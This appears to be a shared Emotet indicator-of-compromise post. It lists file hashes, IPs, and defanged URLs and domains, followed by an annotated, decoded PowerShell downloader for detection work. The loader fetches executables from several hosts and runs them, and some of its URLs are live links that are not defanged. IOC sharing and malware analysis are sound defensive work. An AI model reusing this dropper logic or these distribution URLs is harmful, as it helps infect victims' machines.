paladin316

Emotet_Doc_out_2020-09-09_00_21.txt

Sep 8th, 2020
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. SHA256:
  4. 4ea973ca28598a64c32b8e2730d1cd64bd552dae1422638aa0806b7bb527165d
  5. 68c5b0b61dcddea7b47c877d02a5d3d308d9753bcfd281a5aac05b1fbf496bf6
  6. 1758c8233b795dda6dfd18b1e807adfb07f70ed1e7a75fab66b663d81ea5177f
  7. 1758c8233b795dda6dfd18b1e807adfb07f70ed1e7a75fab66b663d81ea5177f
  8. 4cadcc2c2f79c2311b46289689294ad17bc22ade70117e0d78b3d838124bd96e
  9. c754a9e20e2c22ff468a1ab9f83d04a5e56f3c75d656fbe67fc15ec6857276eb
  10. c754a9e20e2c22ff468a1ab9f83d04a5e56f3c75d656fbe67fc15ec6857276eb
  11. a7feb70fc3867ed145a59e051b4869480f6afafbc9436c6fb7fbae07155cad73
  12. 6cffaf302f33249146288f181c629138504d72143a68e3c79b67c5a9ad8cbf0b
  13. 7a571bdfac93a5d054c876fd020668e2700d7c5220404591908b208f5a68d4ad
  14. 67f9b719ffd1533656476b1e6f7eb63abe6dd3323f6ad28cc149d3e76750f0a1
  15. ec694d65b8558d8ae93d7dcb5b232189d20440574c9eba95443c19f05de0cd20
  16. f61f0a601ff5c59ec1b55108554619978b88cd832cef5dee74ebbfa64cb8b193
  17. 9eae03556e525d06173366c525b5ebe9899a85ef229b3b3d7e43e0fe94f5fd93
  18. 15de7545c8d13285e5cb83c314b0f47ad6428d10169a8d82ab09ab7d7b16bef3
  19.  
  20.  
  21. IPs:
  22. 103.133.215.103
  23. 103.197.57.20
  24. 139.59.134.225
  25. 217.64.195.239
  26. 217.76.132.193
  27. 217.76.150.106
  28. 217.76.150.65
  29. 5.77.60.232
  30. 69.163.217.214
  31. 81.169.145.105
  32. 81.169.145.151
  33. 81.169.145.73
  34. 81.169.145.84
  35. 81.169.145.86
  36.  
  37.  
  38.  
  39. URLs:
  40. hxxp://badaia.net/baiaseu/m4G4chJ/
  41. hxxp://bbcalegal.com/attachments/AAyd/
  42. hxxp://compartirwifi.com/WordPress_01/ZAa/
  43. hxxp://mezes.de/title_htm_files/Mb/
  44. hxxps://bosonit.com/wp-includes/We/
  45. hxxp://vermasiyaahi.com/wp-content/8/
  46.  
  47.  
  48.  
  49. Domains:
  50. badaia.net
  51. bbcalegal.com
  52. compartirwifi.com
  53. mezes.de
  54. bosonit.com
  55. vermasiyaahi.com
  56.  
  57.  
  58. Decoded Base64 PowerShell:
  # Review note: analysis of the decoded loader, from the visible text only. The
  # decode has dropped quotes and parentheses, so this block is not runnable as-is
  # and is kept here as an artefact for detection engineering, not as code.
  # Two near-identical routines follow. Each one: creates a two-level folder under
  # %USERPROFILE%, forces TLS 1.0/1.1/1.2 on ServicePointManager, walks a '*'-separated
  # URL list with WebClient.DownloadFile into <folder>\<name>.exe, and runs the file
  # with Invoke-Item once its length passes a size floor; catch{} swallows every
  # error so the next URL in the list is tried.
  # Obfuscation markers useful for detection: mixed-case cmdlet/property names,
  # backtick-split member names ("do`wN`Lo`ADfilE", "SecuRiT`Y`PROToc`ol"), and
  # filler assignments of random words that are never read again.
  # NOTE(review): the plain http:// and https:// entries in both URL lists below
  # are not defanged, and their hosts do not appear in the URLs/Domains lists above.
  59. $Nv4h9_2=Npfzmmi;
  # Drop folder for the first routine: %USERPROFILE%\l70gE02\KErifx4\.
  60. &new-item $env:USerpROfile\l70gE02\KErifx4\ -itemtype diREcToRy;
  # Pins the TLS versions the WebClient may negotiate; property name is backtick-split.
  61. [Net.ServicePointManager]::"SecuRiT`Y`PROToc`ol" = tls12, tls11, tls;
  # $Kjlii0z becomes the payload file name (used as "$Kjlii0z.exe" below).
  62. $Kjlii0z = Lfqgw3;
  63. $Krx83ci=Trd1xfs;
  # Builds the target path by replacing the marker "Vxw" with [CHAR]92 ('\'),
  # i.e. %USERPROFILE%\L70ge02\Kerifx4\Lfqgw3.exe (quotes lost in the decode).
  64. $Jh_l7tr=$env:userprofileVxwL70ge02VxwKerifx4Vxw -cRePLace Vxw,[CHAR]92$Kjlii0z.exe;
  65. $Le2xz4b=B8n3agx;
  66. $Urkgo8k=&new-object nET.wEbclient;
  # First URL list; the original string was split on '*' ([char]42), hence the
  # ."S`PLIT"[char]42 residue at the end of the last entry.
  67. $T_gu0xv=http://www.agentstepp.com/ww12/6ZI/
  68. hxxp://badaia.net/baiaseu/m4G4chJ/
  69. http://www.bambagiotti.it/shop/ymwU6/
  70. hxxp://bbcalegal.com/attachments/AAyd/
  71. hxxp://mezes.de/title_htm_files/Mb/
  72. http://computerfastfix.co.uk/css/DXj/
  73. http://sacentrs.lv/wp-content/uploads/2018/Cc/."S`PLIT"[char]42;
  74. $Tao2kc_=H4ohjxw;
  # Tries each URL in turn: WebClient.DownloadFile(url, $Jh_l7tr).
  75. foreach$Bfw8bu9 in $T_gu0xv{try{$Urkgo8k."do`wN`Lo`ADfilE"$Bfw8bu9, $Jh_l7tr;
  76. $Yvab7e8=Kx76zrw;
  # Size floor (31817 bytes) guards against error pages / truncated downloads;
  # a file that passes is executed with Invoke-Item and the loop ends.
  77. If &Get-Item $Jh_l7tr."l`EnGtH" -ge 31817 {&Invoke-Item$Jh_l7tr;
  78. $M0w23jo=Pn7p62o;
  79. break;
  # Empty catch{}: a failed download is silent and the next URL is attempted.
  80. $K5pgv2x=Umyheq5}}catch{}}$Un3z_hg=Q9j3ahv$Sxx24oa=Eqiyls5;
  # Second routine, same structure; uses the '.' call operator instead of '&'.
  # Drop folder: %USERPROFILE%\T46Uc61\K4aAAlc\.
  81. .new-item $enV:USERPRoFIlE\T46Uc61\K4aAAlc\ -itemtype diRecTORy;
  82. [Net.ServicePointManager]::"SEcur`itYpRotO`C`OL" = tls12, tls11, tls;
  83. $Xbqyfgn = Tui29h08;
  84. $N5x7mbw=J_tuw7m;
  # Same path construction, this time via a -f format string with {0} = [cHAr]92 ('\'),
  # i.e. %USERPROFILE%\T46uc61\K4aaalc\Tui29h08.exe (quotes lost in the decode).
  85. $Tyhiq8n=$env:userprofile{0}T46uc61{0}K4aaalc{0}-F [cHAr]92$Xbqyfgn.exe;
  86. $Cnwwcn7=Njrdlgs;
  87. $Wqyop_x=.new-object NEt.WebCLIeNt;
  # Second URL list, also '*'-separated.
  88. $Qttfz2g=http://tskgear.com/wp-content/uploads/2017/NVa/
  89. hxxp://vermasiyaahi.com/wp-content/8/
  90. https://bauzeichnung.com/cgi-bin/8V/
  91. http://bobenstetter.net/cgi-bin/V/
  92. hxxps://bosonit.com/wp-includes/We/
  93. http://chinese-photography.net/books/T7/
  94. hxxp://compartirwifi.com/WordPress_01/ZAa/."Sp`Lit"[char]42;
  95. $S4kvn65=Qz9tl0g;
  96. foreach$Sej_u32 in $Qttfz2g{try{$Wqyop_x."dOwNl`Oa`DFI`le"$Sej_u32, $Tyhiq8n;
  97. $X055ml7=Yzncvty;
  # Size floor for this routine is 23984 bytes.
  98. If .Get-Item $Tyhiq8n."LEn`gth" -ge 23984 {&Invoke-Item$Tyhiq8n;
  99. $W54w3pj=F_oqnxu;
  100. break;
  101. $Vhmnzlp=Dxzr24d}}catch{}}$Tbqfnce=Okelszv
  102.  